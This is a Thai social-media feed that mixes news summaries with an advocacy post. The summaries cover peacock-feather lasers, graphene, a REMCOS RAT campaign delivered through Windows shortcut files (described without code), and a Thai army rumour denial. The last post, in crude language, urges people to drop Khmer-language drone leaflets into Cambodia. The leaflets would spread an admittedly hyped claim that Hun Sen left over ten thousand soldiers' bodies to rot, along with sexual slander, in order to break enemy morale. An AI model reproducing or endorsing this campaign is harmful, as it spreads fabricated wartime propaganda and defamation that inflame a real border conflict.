• เรื่องเล่าจากข่าว: นกยูงกับเลเซอร์ในขนหาง—เมื่อธรรมชาติสร้างโพรงแสงได้เอง

    ขนนกยูงตัวผู้มีลวดลายตาไก่ที่สวยงาม ซึ่งเกิดจากโครงสร้างระดับนาโน ไม่ใช่เม็ดสี โดยเฉพาะในส่วนที่เรียกว่า “barbules” ซึ่งเป็นเส้นใยเล็ก ๆ ที่มีแท่งเมลานินเคลือบด้วยเคราตินเรียงตัวอย่างแม่นยำ ทำให้เกิดสีรุ้งที่เปลี่ยนไปตามมุมมอง

    ทีมนักวิจัยจากหลายมหาวิทยาลัยในสหรัฐฯ ได้ทดลองหยดสารเรืองแสง rhodamine 6G ลงบนขนนกยูงหลายรอบ แล้วใช้แสงเลเซอร์สีเขียวยิงเข้าไป พบว่าเกิดการเปล่งแสงเลเซอร์ที่มีความถี่คงที่ที่ 574 และ 583 นาโนเมตร ซึ่งเป็นสีเหลือง-ส้ม

    สิ่งที่น่าทึ่งคือ ไม่ว่าจะยิงไปที่ส่วนไหนของตาไก่—ไม่ว่าจะเป็นสีน้ำเงิน เขียว เหลือง หรือน้ำตาล—ก็ได้ผลเหมือนกันหมด แสดงว่าโครงสร้างภายในขนนกยูงมีความเป็นระเบียบและสามารถทำหน้าที่เป็นโพรงเลเซอร์ได้จริง

    ผลการทดลองนี้แตกต่างจาก “random laser” ที่เคยพบในเนื้อเยื่อสัตว์อื่น ๆ ซึ่งมักให้ผลไม่แน่นอน แต่ขนนกยูงให้ผลซ้ำได้ทุกครั้ง และอาจนำไปสู่การสร้างเลเซอร์ชีวภาพที่ปลอดภัยสำหรับใช้ในร่างกาย เช่น การตรวจวินิจฉัยหรือการรักษา

    ขนนกยูงสามารถเปล่งแสงเลเซอร์ได้เมื่อเติมสารเรืองแสงและยิงแสงเลเซอร์เข้าไป
    ใช้สาร rhodamine 6G และแสงเลเซอร์สีเขียว 532 นาโนเมตร
    เกิดแสงเลเซอร์ที่ 574 และ 583 นาโนเมตร

    โครงสร้างภายในขนนกยูงทำหน้าที่เป็นโพรงเลเซอร์ได้โดยธรรมชาติ
    barbules มีโครงสร้างนาโนที่เรียงตัวอย่างแม่นยำ
    ทำหน้าที่คล้าย photonic crystals ที่สะท้อนและขยายแสง

    ผลการทดลองให้ผลซ้ำได้ทุกครั้ง ไม่ใช่แบบสุ่ม
    แตกต่างจาก random laser ที่พบในเนื้อเยื่ออื่น
    แสดงถึงความเป็นระเบียบในโครงสร้างชีวภาพ

    เป็นครั้งแรกที่พบโพรงเลเซอร์ในเนื้อเยื่อของสัตว์
    อาจนำไปสู่การสร้างเลเซอร์ชีวภาพที่ปลอดภัย
    ใช้ในการตรวจวินิจฉัยภายในร่างกายมนุษย์

    การทดลองใช้ขนนกยูงธรรมชาติที่ไม่มีสารเจือปน
    ตัดเฉพาะส่วนตาไก่และทำความสะอาดก่อนทดลอง
    ทำให้ผลการทดลองมีความแม่นยำและน่าเชื่อถือ

    สีของขนนกยูงเกิดจากโครงสร้าง ไม่ใช่เม็ดสี
    เป็นตัวอย่างของ “structural color” ที่เกิดจากการหักเหของแสง
    คล้ายกับสีในปีกผีเสื้อหรือเกล็ดของแมลงบางชนิด

    photonic crystals ในธรรมชาติสามารถนำไปพัฒนาเทคโนโลยีใหม่
    เช่น หน้าต่างเปลี่ยนสี, ผิววัสดุที่ทำความสะอาดตัวเอง, หรือสิ่งทอกันน้ำ
    อาจใช้ในธนบัตรเพื่อป้องกันการปลอมแปลง

    การศึกษาโครงสร้างชีวภาพระดับนาโนช่วยให้เข้าใจธรรมชาติและสร้างวัสดุใหม่
    เป็นแนวทางของ “biophotonics” และ “bio-inspired engineering”
    อาจนำไปสู่การออกแบบเลเซอร์ที่ปลอดภัยและเข้ากันได้กับร่างกายมนุษย์

    https://www.techspot.com/news/108915-scientists-transform-peacock-feathers-tiny-biological-laser-beams.html
    🎙️ เรื่องเล่าจากข่าว: นกยูงกับเลเซอร์ในขนหาง—เมื่อธรรมชาติสร้างโพรงแสงได้เอง ขนนกยูงตัวผู้มีลวดลายตาไก่ที่สวยงาม ซึ่งเกิดจากโครงสร้างระดับนาโน ไม่ใช่เม็ดสี โดยเฉพาะในส่วนที่เรียกว่า “barbules” ซึ่งเป็นเส้นใยเล็ก ๆ ที่มีแท่งเมลานินเคลือบด้วยเคราตินเรียงตัวอย่างแม่นยำ ทำให้เกิดสีรุ้งที่เปลี่ยนไปตามมุมมอง ทีมนักวิจัยจากหลายมหาวิทยาลัยในสหรัฐฯ ได้ทดลองหยดสารเรืองแสง rhodamine 6G ลงบนขนนกยูงหลายรอบ แล้วใช้แสงเลเซอร์สีเขียวยิงเข้าไป พบว่าเกิดการเปล่งแสงเลเซอร์ที่มีความถี่คงที่ที่ 574 และ 583 นาโนเมตร ซึ่งเป็นสีเหลือง-ส้ม สิ่งที่น่าทึ่งคือ ไม่ว่าจะยิงไปที่ส่วนไหนของตาไก่—ไม่ว่าจะเป็นสีน้ำเงิน เขียว เหลือง หรือน้ำตาล—ก็ได้ผลเหมือนกันหมด แสดงว่าโครงสร้างภายในขนนกยูงมีความเป็นระเบียบและสามารถทำหน้าที่เป็นโพรงเลเซอร์ได้จริง ผลการทดลองนี้แตกต่างจาก “random laser” ที่เคยพบในเนื้อเยื่อสัตว์อื่น ๆ ซึ่งมักให้ผลไม่แน่นอน แต่ขนนกยูงให้ผลซ้ำได้ทุกครั้ง และอาจนำไปสู่การสร้างเลเซอร์ชีวภาพที่ปลอดภัยสำหรับใช้ในร่างกาย เช่น การตรวจวินิจฉัยหรือการรักษา ✅ ขนนกยูงสามารถเปล่งแสงเลเซอร์ได้เมื่อเติมสารเรืองแสงและยิงแสงเลเซอร์เข้าไป ➡️ ใช้สาร rhodamine 6G และแสงเลเซอร์สีเขียว 532 นาโนเมตร ➡️ เกิดแสงเลเซอร์ที่ 574 และ 583 นาโนเมตร ✅ โครงสร้างภายในขนนกยูงทำหน้าที่เป็นโพรงเลเซอร์ได้โดยธรรมชาติ ➡️ barbules มีโครงสร้างนาโนที่เรียงตัวอย่างแม่นยำ ➡️ ทำหน้าที่คล้าย photonic crystals ที่สะท้อนและขยายแสง ✅ ผลการทดลองให้ผลซ้ำได้ทุกครั้ง ไม่ใช่แบบสุ่ม ➡️ แตกต่างจาก random laser ที่พบในเนื้อเยื่ออื่น ➡️ แสดงถึงความเป็นระเบียบในโครงสร้างชีวภาพ ✅ เป็นครั้งแรกที่พบโพรงเลเซอร์ในเนื้อเยื่อของสัตว์ ➡️ อาจนำไปสู่การสร้างเลเซอร์ชีวภาพที่ปลอดภัย ➡️ ใช้ในการตรวจวินิจฉัยภายในร่างกายมนุษย์ ✅ การทดลองใช้ขนนกยูงธรรมชาติที่ไม่มีสารเจือปน ➡️ ตัดเฉพาะส่วนตาไก่และทำความสะอาดก่อนทดลอง ➡️ ทำให้ผลการทดลองมีความแม่นยำและน่าเชื่อถือ ✅ สีของขนนกยูงเกิดจากโครงสร้าง ไม่ใช่เม็ดสี ➡️ เป็นตัวอย่างของ “structural color” ที่เกิดจากการหักเหของแสง ➡️ คล้ายกับสีในปีกผีเสื้อหรือเกล็ดของแมลงบางชนิด ✅ photonic crystals ในธรรมชาติสามารถนำไปพัฒนาเทคโนโลยีใหม่ ➡️ เช่น หน้าต่างเปลี่ยนสี, ผิววัสดุที่ทำความสะอาดตัวเอง, หรือสิ่งทอกันน้ำ ➡️ อาจใช้ในธนบัตรเพื่อป้องกันการปลอมแปลง ✅ การศึกษาโครงสร้างชีวภาพระดับนาโนช่วยให้เข้าใจธรรมชาติและสร้างวัสดุใหม่ ➡️ เป็นแนวทางของ “biophotonics” และ “bio-inspired engineering” ➡️ อาจนำไปสู่การออกแบบเลเซอร์ที่ปลอดภัยและเข้ากันได้กับร่างกายมนุษย์ https://www.techspot.com/news/108915-scientists-transform-peacock-feathers-tiny-biological-laser-beams.html
    WWW.TECHSPOT.COM
    Scientists transform peacock feathers into tiny biological laser beams
    The research, conducted by researchers from several US universities and published in Nature, set out to explore the behavior of peacock feather barbules – microscopic structures that...
    0 ความคิดเห็น 0 การแบ่งปัน 5 มุมมอง 0 รีวิว
  • เรื่องเล่าจากข่าว: กราฟีนที่เคยแข็งแกร่ง กลับยืดหยุ่นได้ด้วยลอนคลื่นระดับอะตอม

    นักฟิสิกส์จากมหาวิทยาลัย Vienna และ Vienna University of Technology ได้ค้นพบวิธีทำให้กราฟีน—วัสดุที่บางเพียงหนึ่งอะตอมและแข็งแกร่งที่สุด—สามารถยืดหยุ่นได้มากขึ้น โดยใช้เทคนิคการสร้าง “ข้อบกพร่อง” (defects) ด้วยการยิงไอออนอาร์กอนพลังงานต่ำเข้าไปในโครงสร้างอะตอมของกราฟีน ทำให้เกิด “vacancies” หรือช่องว่างจากอะตอมที่หายไป

    ผลลัพธ์คือเกิดลอนคลื่นคล้ายหีบเพลงในโครงสร้างของกราฟีน ซึ่งช่วยให้วัสดุสามารถยืดออกได้ง่ายขึ้นมาก โดยไม่ต้องใช้แรงมากเหมือนการยืดวัสดุเรียบ ๆ แบบเดิม

    การทดลองนี้เกิดขึ้นในสภาพแวดล้อมที่สะอาดไร้ฝุ่นและอากาศ เพื่อให้มั่นใจว่าไม่มีสิ่งแปลกปลอมมารบกวนพื้นผิวของกราฟีน ซึ่งเป็นสิ่งสำคัญมาก เพราะหากมีสิ่งสกปรกอยู่บนพื้นผิว จะทำให้กราฟีนกลับมาแข็งขึ้นแทนที่จะอ่อนลง

    กราฟีนถูกทำให้ยืดหยุ่นขึ้นด้วยการสร้างลอนคลื่นคล้ายหีบเพลง (accordion effect)
    ใช้การยิงไอออนอาร์กอนพลังงานต่ำเพื่อสร้างช่องว่างอะตอม
    ลอนคลื่นช่วยลดแรงที่ต้องใช้ในการยืดวัสดุ

    การทดลองเกิดขึ้นในสภาพแวดล้อมที่สะอาดไร้ฝุ่นและอากาศ
    ป้องกันไม่ให้สิ่งแปลกปลอมรบกวนพื้นผิวกราฟีน
    ทำให้ผลการทดลองแม่นยำและเสถียร

    ค่าความยืดหยุ่นของกราฟีนลดลงจาก 286 N/m เหลือ 158 N/m หลังสร้าง defects
    เป็นการเปลี่ยนแปลงที่มากกว่าที่ทฤษฎีเคยคาดไว้
    อธิบายความขัดแย้งในผลการทดลองก่อนหน้านี้

    การสร้าง defects แบบควบคุมได้ช่วยให้วัสดุมีคุณสมบัติใหม่
    เปิดทางสู่การใช้งานในอุปกรณ์อิเล็กทรอนิกส์แบบยืดหยุ่น
    เหมาะกับเทคโนโลยีสวมใส่และอุปกรณ์พับได้

    การจำลองด้วยคอมพิวเตอร์ยืนยันว่า defects แบบหลายอะตอมมีผลมากกว่าการลบอะตอมเดี่ยว
    ลอนคลื่นเกิดจากแรงดึงรอบจุดที่มีหลายอะตอมหายไป
    การลบอะตอมเดี่ยวไม่ส่งผลต่อความยืดหยุ่นมากนัก

    https://www.neowin.net/news/the-miracle-material-has-been-bent-like-never-before/
    🎙️ เรื่องเล่าจากข่าว: กราฟีนที่เคยแข็งแกร่ง กลับยืดหยุ่นได้ด้วยลอนคลื่นระดับอะตอม นักฟิสิกส์จากมหาวิทยาลัย Vienna และ Vienna University of Technology ได้ค้นพบวิธีทำให้กราฟีน—วัสดุที่บางเพียงหนึ่งอะตอมและแข็งแกร่งที่สุด—สามารถยืดหยุ่นได้มากขึ้น โดยใช้เทคนิคการสร้าง “ข้อบกพร่อง” (defects) ด้วยการยิงไอออนอาร์กอนพลังงานต่ำเข้าไปในโครงสร้างอะตอมของกราฟีน ทำให้เกิด “vacancies” หรือช่องว่างจากอะตอมที่หายไป ผลลัพธ์คือเกิดลอนคลื่นคล้ายหีบเพลงในโครงสร้างของกราฟีน ซึ่งช่วยให้วัสดุสามารถยืดออกได้ง่ายขึ้นมาก โดยไม่ต้องใช้แรงมากเหมือนการยืดวัสดุเรียบ ๆ แบบเดิม การทดลองนี้เกิดขึ้นในสภาพแวดล้อมที่สะอาดไร้ฝุ่นและอากาศ เพื่อให้มั่นใจว่าไม่มีสิ่งแปลกปลอมมารบกวนพื้นผิวของกราฟีน ซึ่งเป็นสิ่งสำคัญมาก เพราะหากมีสิ่งสกปรกอยู่บนพื้นผิว จะทำให้กราฟีนกลับมาแข็งขึ้นแทนที่จะอ่อนลง ✅ กราฟีนถูกทำให้ยืดหยุ่นขึ้นด้วยการสร้างลอนคลื่นคล้ายหีบเพลง (accordion effect) ➡️ ใช้การยิงไอออนอาร์กอนพลังงานต่ำเพื่อสร้างช่องว่างอะตอม ➡️ ลอนคลื่นช่วยลดแรงที่ต้องใช้ในการยืดวัสดุ ✅ การทดลองเกิดขึ้นในสภาพแวดล้อมที่สะอาดไร้ฝุ่นและอากาศ ➡️ ป้องกันไม่ให้สิ่งแปลกปลอมรบกวนพื้นผิวกราฟีน ➡️ ทำให้ผลการทดลองแม่นยำและเสถียร ✅ ค่าความยืดหยุ่นของกราฟีนลดลงจาก 286 N/m เหลือ 158 N/m หลังสร้าง defects ➡️ เป็นการเปลี่ยนแปลงที่มากกว่าที่ทฤษฎีเคยคาดไว้ ➡️ อธิบายความขัดแย้งในผลการทดลองก่อนหน้านี้ ✅ การสร้าง defects แบบควบคุมได้ช่วยให้วัสดุมีคุณสมบัติใหม่ ➡️ เปิดทางสู่การใช้งานในอุปกรณ์อิเล็กทรอนิกส์แบบยืดหยุ่น ➡️ เหมาะกับเทคโนโลยีสวมใส่และอุปกรณ์พับได้ ✅ การจำลองด้วยคอมพิวเตอร์ยืนยันว่า defects แบบหลายอะตอมมีผลมากกว่าการลบอะตอมเดี่ยว ➡️ ลอนคลื่นเกิดจากแรงดึงรอบจุดที่มีหลายอะตอมหายไป ➡️ การลบอะตอมเดี่ยวไม่ส่งผลต่อความยืดหยุ่นมากนัก https://www.neowin.net/news/the-miracle-material-has-been-bent-like-never-before/
    WWW.NEOWIN.NET
    The "miracle material" has been bent like never before
    Physicists discover a counterintuitive method that makes "miracle material" dramatically more stretchable, challenging long-held assumptions about its mechanical limits.
    0 ความคิดเห็น 0 การแบ่งปัน 8 มุมมอง 0 รีวิว
  • เรื่องเล่าจากข่าว: เมื่อไฟล์ลัดกลายเป็นประตูหลัง—REMCOS RAT แฝงตัวผ่าน LNK และ PowerShell โดยไม่ทิ้งร่องรอย

    ทีมวิจัย Lat61 จากบริษัท Point Wild ได้เปิดเผยแคมเปญมัลแวร์หลายขั้นตอนที่ใช้ไฟล์ลัด Windows (.lnk) เป็นตัวเปิดทางให้ REMCOS RAT เข้าสู่ระบบของเหยื่อ โดยเริ่มจากไฟล์ที่ดูเหมือนไม่มีพิษภัย เช่น “ORDINE-DI-ACQUIST-7263535.lnk” ซึ่งเมื่อคลิกแล้วจะรันคำสั่ง PowerShell แบบลับ ๆ เพื่อดาวน์โหลด payload ที่ถูกเข้ารหัสแบบ Base64 จากเซิร์ฟเวอร์ภายนอก

    หลังจากถอดรหัสแล้ว payload จะถูกเปิดใช้งานในรูปแบบไฟล์ .PIF ที่ปลอมเป็น CHROME.PIF เพื่อหลอกว่าเป็นโปรแกรมจริง ก่อนจะติดตั้ง REMCOS RAT ซึ่งสามารถควบคุมคอมพิวเตอร์ได้เต็มรูปแบบ—ตั้งแต่ keylogging, เปิดกล้อง, ไปจนถึงการสร้าง shell ระยะไกล

    แคมเปญนี้ยังใช้เทคนิคหลบเลี่ยงการตรวจจับ เช่น ไม่ใช้ไฟล์บนดิสก์, ไม่ใช้ macro, และไม่แสดงคำเตือนใด ๆ ทำให้ผู้ใช้ทั่วไปแทบไม่รู้ตัวว่าโดนโจมตี

    แคมเปญมัลแวร์ใหม่ใช้ไฟล์ลัด Windows (.lnk) เป็นช่องทางติดตั้ง REMCOS RAT
    ไฟล์ลัดปลอมเป็นเอกสารหรือโปรแกรม เช่น “ORDINE-DI-ACQUIST…”
    เมื่อคลิกจะรัน PowerShell แบบลับ ๆ

    PowerShell ถูกใช้เพื่อดาวน์โหลด payload ที่ถูกเข้ารหัสแบบ Base64 จากเซิร์ฟเวอร์ภายนอก
    ไม่ใช้ไฟล์บนดิสก์หรือ macro ทำให้หลบการตรวจจับได้
    payload ถูกเปิดใช้งานในรูปแบบไฟล์ .PIF ปลอมชื่อเป็น CHROME.PIF

    REMCOS RAT ให้ผู้โจมตีควบคุมระบบได้เต็มรูปแบบ
    keylogging, เปิดกล้อง, สร้าง shell ระยะไกล, เข้าถึงไฟล์
    สร้าง log file ใน %ProgramData% เพื่อเก็บข้อมูลการกดแป้นพิมพ์

    เซิร์ฟเวอร์ควบคุม (C2) ของแคมเปญนี้อยู่ในสหรัฐฯ และโรมาเนีย
    แสดงให้เห็นว่าการโจมตีสามารถมาจากหลายประเทศ
    ใช้โครงสร้างแบบกระจายเพื่อหลบการติดตาม

    ไฟล์ลัดไม่แสดงคำเตือน macro และสามารถหลอกผู้ใช้ได้ง่าย
    Windows ซ่อนนามสกุลไฟล์โดยค่าเริ่มต้น
    ไฟล์ .lnk อาจดูเหมือน .pdf หรือ .docx.

    ไฟล์ลัด (.lnk) สามารถรันคำสั่งอันตรายได้โดยไม่ต้องใช้ macro หรือไฟล์ .exe
    ผู้ใช้มักเข้าใจผิดว่าเป็นไฟล์เอกสาร
    ไม่มีการแจ้งเตือนจากระบบความปลอดภัยของ Office

    REMCOS RAT สามารถทำงานแบบ fileless โดยไม่ทิ้งร่องรอยบนดิสก์
    ยากต่อการตรวจจับด้วย antivirus แบบดั้งเดิม
    ต้องใช้ระบบป้องกันแบบ real-time และ behavioral analysis

    การปลอมชื่อไฟล์และไอคอนทำให้ผู้ใช้หลงเชื่อว่าเป็นไฟล์จริง
    Windows ซ่อนนามสกุลไฟล์โดยค่าเริ่มต้น
    ไฟล์ .lnk อาจดูเหมือน “Invoice.pdf” ทั้งที่เป็น shortcut

    การเปิดไฟล์จากอีเมลหรือเครือข่ายที่ไม่ปลอดภัยอาจนำไปสู่การติดมัลแวร์ทันที
    ไม่ควรเปิดไฟล์แนบจากผู้ส่งที่ไม่รู้จัก
    ควรใช้ sandbox หรือระบบแยกเพื่อทดสอบไฟล์ก่อนเปิด

    https://hackread.com/attack-windows-shortcut-files-install-remcos-backdoor/
    🎙️ เรื่องเล่าจากข่าว: เมื่อไฟล์ลัดกลายเป็นประตูหลัง—REMCOS RAT แฝงตัวผ่าน LNK และ PowerShell โดยไม่ทิ้งร่องรอย ทีมวิจัย Lat61 จากบริษัท Point Wild ได้เปิดเผยแคมเปญมัลแวร์หลายขั้นตอนที่ใช้ไฟล์ลัด Windows (.lnk) เป็นตัวเปิดทางให้ REMCOS RAT เข้าสู่ระบบของเหยื่อ โดยเริ่มจากไฟล์ที่ดูเหมือนไม่มีพิษภัย เช่น “ORDINE-DI-ACQUIST-7263535.lnk” ซึ่งเมื่อคลิกแล้วจะรันคำสั่ง PowerShell แบบลับ ๆ เพื่อดาวน์โหลด payload ที่ถูกเข้ารหัสแบบ Base64 จากเซิร์ฟเวอร์ภายนอก หลังจากถอดรหัสแล้ว payload จะถูกเปิดใช้งานในรูปแบบไฟล์ .PIF ที่ปลอมเป็น CHROME.PIF เพื่อหลอกว่าเป็นโปรแกรมจริง ก่อนจะติดตั้ง REMCOS RAT ซึ่งสามารถควบคุมคอมพิวเตอร์ได้เต็มรูปแบบ—ตั้งแต่ keylogging, เปิดกล้อง, ไปจนถึงการสร้าง shell ระยะไกล แคมเปญนี้ยังใช้เทคนิคหลบเลี่ยงการตรวจจับ เช่น ไม่ใช้ไฟล์บนดิสก์, ไม่ใช้ macro, และไม่แสดงคำเตือนใด ๆ ทำให้ผู้ใช้ทั่วไปแทบไม่รู้ตัวว่าโดนโจมตี ✅ แคมเปญมัลแวร์ใหม่ใช้ไฟล์ลัด Windows (.lnk) เป็นช่องทางติดตั้ง REMCOS RAT ➡️ ไฟล์ลัดปลอมเป็นเอกสารหรือโปรแกรม เช่น “ORDINE-DI-ACQUIST…” ➡️ เมื่อคลิกจะรัน PowerShell แบบลับ ๆ ✅ PowerShell ถูกใช้เพื่อดาวน์โหลด payload ที่ถูกเข้ารหัสแบบ Base64 จากเซิร์ฟเวอร์ภายนอก ➡️ ไม่ใช้ไฟล์บนดิสก์หรือ macro ทำให้หลบการตรวจจับได้ ➡️ payload ถูกเปิดใช้งานในรูปแบบไฟล์ .PIF ปลอมชื่อเป็น CHROME.PIF ✅ REMCOS RAT ให้ผู้โจมตีควบคุมระบบได้เต็มรูปแบบ ➡️ keylogging, เปิดกล้อง, สร้าง shell ระยะไกล, เข้าถึงไฟล์ ➡️ สร้าง log file ใน %ProgramData% เพื่อเก็บข้อมูลการกดแป้นพิมพ์ ✅ เซิร์ฟเวอร์ควบคุม (C2) ของแคมเปญนี้อยู่ในสหรัฐฯ และโรมาเนีย ➡️ แสดงให้เห็นว่าการโจมตีสามารถมาจากหลายประเทศ ➡️ ใช้โครงสร้างแบบกระจายเพื่อหลบการติดตาม ✅ ไฟล์ลัดไม่แสดงคำเตือน macro และสามารถหลอกผู้ใช้ได้ง่าย ➡️ Windows ซ่อนนามสกุลไฟล์โดยค่าเริ่มต้น ➡️ ไฟล์ .lnk อาจดูเหมือน .pdf หรือ .docx. ‼️ ไฟล์ลัด (.lnk) สามารถรันคำสั่งอันตรายได้โดยไม่ต้องใช้ macro หรือไฟล์ .exe ⛔ ผู้ใช้มักเข้าใจผิดว่าเป็นไฟล์เอกสาร ⛔ ไม่มีการแจ้งเตือนจากระบบความปลอดภัยของ Office ‼️ REMCOS RAT สามารถทำงานแบบ fileless โดยไม่ทิ้งร่องรอยบนดิสก์ ⛔ ยากต่อการตรวจจับด้วย antivirus แบบดั้งเดิม ⛔ ต้องใช้ระบบป้องกันแบบ real-time และ behavioral analysis ‼️ การปลอมชื่อไฟล์และไอคอนทำให้ผู้ใช้หลงเชื่อว่าเป็นไฟล์จริง ⛔ Windows ซ่อนนามสกุลไฟล์โดยค่าเริ่มต้น ⛔ ไฟล์ .lnk อาจดูเหมือน “Invoice.pdf” ทั้งที่เป็น shortcut ‼️ การเปิดไฟล์จากอีเมลหรือเครือข่ายที่ไม่ปลอดภัยอาจนำไปสู่การติดมัลแวร์ทันที ⛔ ไม่ควรเปิดไฟล์แนบจากผู้ส่งที่ไม่รู้จัก ⛔ ควรใช้ sandbox หรือระบบแยกเพื่อทดสอบไฟล์ก่อนเปิด https://hackread.com/attack-windows-shortcut-files-install-remcos-backdoor/
    HACKREAD.COM
    New Attack Uses Windows Shortcut Files to Install REMCOS Backdoor
    Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
    0 ความคิดเห็น 0 การแบ่งปัน 10 มุมมอง 0 รีวิว
  • กองทัพไทยยันข่าวปลอม! ปฏิเสธข่าวลืออพยพคนสุรินทร์ ย้ำยังคงหยุดยิงแต่พร้อมรับมือเขมร ยันปล่อย 18 เชลยเมื่อรบจบ ไม่ใช่แค่หยุดยิง จับชาวเขมรต้องสงสัยสอดแนมชายแดนไทย
    .
    อ่านเพิ่มเติม..https://sondhitalk.com/detail/9680000073614

    #Sondhitalk #SondhiX #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire
    กองทัพไทยยันข่าวปลอม! ปฏิเสธข่าวลืออพยพคนสุรินทร์ ย้ำยังคงหยุดยิงแต่พร้อมรับมือเขมร ยันปล่อย 18 เชลยเมื่อรบจบ ไม่ใช่แค่หยุดยิง จับชาวเขมรต้องสงสัยสอดแนมชายแดนไทย . อ่านเพิ่มเติม..https://sondhitalk.com/detail/9680000073614 #Sondhitalk #SondhiX #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire
    Like
    1
    0 ความคิดเห็น 0 การแบ่งปัน 63 มุมมอง 0 รีวิว
  • #โดรนไทยแจกใบปลิวในเขมรบอกชาวเขมรว่าฮุนเซนทิ้งศพจนเน่าของทหารเขมรตายเป็นหมื่นศพ.
    #โดรนไทยทิ้งใบปลิวบอกชาวเขมรว่าฮุนเซนไม่เก็บศพทหารกว่าหมื่นศพ.

    #ฮุนเซนไม่เก็บศพทหารกว่าหมื่นศพ.

    ..สื่อไทยเราปั่นกระแสโหนกระแสมากๆเลยว่าฮุนเซนฮุนมาเนตทิ้งศพเขมรเป็นหมื่นๆศพเน่าคาชายแดน,หากเขมรเชื่อข่าวปลอมบิดเบือนแบบมาลีมันนักก็มีใครก็ได้สร้างคลิปทหารเขมรตายกว่าหมื่นศพแต่ฮุนเซนไม่มาเก็บศพให้ญาติทหารเขมรที่ตาย,โหนกระแสสร้างความเกียจชังแก่ฮุนเซนโดยชาวเขมรเลย,ถ้านายใหญ่ในไทยโทรสั่งบอกสื่ออย่าเล่นข่าวนี้แก่ฮุนเซนปกป้องฮุนเซนช่วยกูมากๆด้วยอย่าทำเครดิตฮุนเซนกูตกต่ำแบบนายใหญ่สั่งทหารไทยอย่าตอบโต้ทหารเขมรแบบนั้นล่ะ สื่อไทยเราโหนกระแสนี้ทุกๆวันเลย เช้า เที่ยง เย็น ดึกด้วย ,ให้พ่อมันแบบมาเลย์แบบอเมริกา ให้ชาวเขมรเรียกร้องอเมริกาช่วยฮุนเซนฮุนมาเน็ตนำทหารมาเลย์นำทหารอเมริกามาเก็บกู้ซากศพทหารเขมรให้ญาติทหารเขมรไปประกอบพิธีทางศาสนาด้วยเพื่อความเป็นมนุษยธรรมนั้นล่ะเป็นคนกลางแล้วมาช่วยเจรจาสงบศึกหยุดยิงด้วย,บุกดงกับระเบิดที่ทหารเขมรวางเองช่วยไปเก็บกู้ซากศพทหารเขมรให้ประชาชนชาวเขมรด้วย.

    ใช้โดรนเราทิ้งใบปลิวเป็นภาษาเขมรว่า ฮุนเซนฮุนมาเซนทิ้งศพทหารญาติของทหารเขมรกว่าหมื่นศพทั่วหมู่บ้านเขมรที่โดรนเราบินกลับไปถึงชาวบ้านมันได้,บินไปชุมชนเมืองใหญ่ๆมันด้วยเลย,เหยียบหยามว่าโดรนไทยก็มาถึงถิ่นมรึงได้,บวกทิ้งโปรยข่าวด้วยมืออีกว่ามรึง!!ฮุนเซนและฮุนมาเนตทิ้งศพทหารเขมรจนเน่าคาป่าไม่เก็บกู้ให้เกียรติทหารเขมรที่ตายและญาติของทหารไร้มนุษยธรรมขาดภาวะผู้นำทัพที่ดีอัดท้ายใบปลิวข่าวเป็นภาษาเขมรกับฮุนเซนมีมันส์กับนางมาลีแทนเมียหลวงมันอีก,ได้บันเทิงแน่นอน,ปิดทางเน็ตได้แต่ปิดทางตีนทางมือทำเองพื้นๆไม่ได้แน่นอน,ประชาชนติดพรมแดนเอาโดนบินไปฝั่งมันก็น่าจะได้นะ ทหารไทยเราไม่สะดวกก็จัดแทนเลย,ทหารไทยเราอย่าตั้งรับอย่างเดียว,มุกนี้ทำลายขวัญกำลังใจมันสดๆร้อนๆได้.กลยุทธทางทหารอีกมุม,เหี้ยให้มันบินโดรนมาก่อกวนเราฝ่ายเดียวทำไม,บินโดรนแบบนี้ทิ้งบอกว่าฮุนเซนทิ้งศพทหารเป็นหมื่นไปเลย.

    https://youtube.com/watch?v=BdOokE0rHO8&si=HNQv1Khb3rKHzwU-
    #โดรนไทยแจกใบปลิวในเขมรบอกชาวเขมรว่าฮุนเซนทิ้งศพจนเน่าของทหารเขมรตายเป็นหมื่นศพ. #โดรนไทยทิ้งใบปลิวบอกชาวเขมรว่าฮุนเซนไม่เก็บศพทหารกว่าหมื่นศพ. #ฮุนเซนไม่เก็บศพทหารกว่าหมื่นศพ. ..สื่อไทยเราปั่นกระแสโหนกระแสมากๆเลยว่าฮุนเซนฮุนมาเนตทิ้งศพเขมรเป็นหมื่นๆศพเน่าคาชายแดน,หากเขมรเชื่อข่าวปลอมบิดเบือนแบบมาลีมันนักก็มีใครก็ได้สร้างคลิปทหารเขมรตายกว่าหมื่นศพแต่ฮุนเซนไม่มาเก็บศพให้ญาติทหารเขมรที่ตาย,โหนกระแสสร้างความเกียจชังแก่ฮุนเซนโดยชาวเขมรเลย,ถ้านายใหญ่ในไทยโทรสั่งบอกสื่ออย่าเล่นข่าวนี้แก่ฮุนเซนปกป้องฮุนเซนช่วยกูมากๆด้วยอย่าทำเครดิตฮุนเซนกูตกต่ำแบบนายใหญ่สั่งทหารไทยอย่าตอบโต้ทหารเขมรแบบนั้นล่ะ สื่อไทยเราโหนกระแสนี้ทุกๆวันเลย เช้า เที่ยง เย็น ดึกด้วย ,ให้พ่อมันแบบมาเลย์แบบอเมริกา ให้ชาวเขมรเรียกร้องอเมริกาช่วยฮุนเซนฮุนมาเน็ตนำทหารมาเลย์นำทหารอเมริกามาเก็บกู้ซากศพทหารเขมรให้ญาติทหารเขมรไปประกอบพิธีทางศาสนาด้วยเพื่อความเป็นมนุษยธรรมนั้นล่ะเป็นคนกลางแล้วมาช่วยเจรจาสงบศึกหยุดยิงด้วย,บุกดงกับระเบิดที่ทหารเขมรวางเองช่วยไปเก็บกู้ซากศพทหารเขมรให้ประชาชนชาวเขมรด้วย. ใช้โดรนเราทิ้งใบปลิวเป็นภาษาเขมรว่า 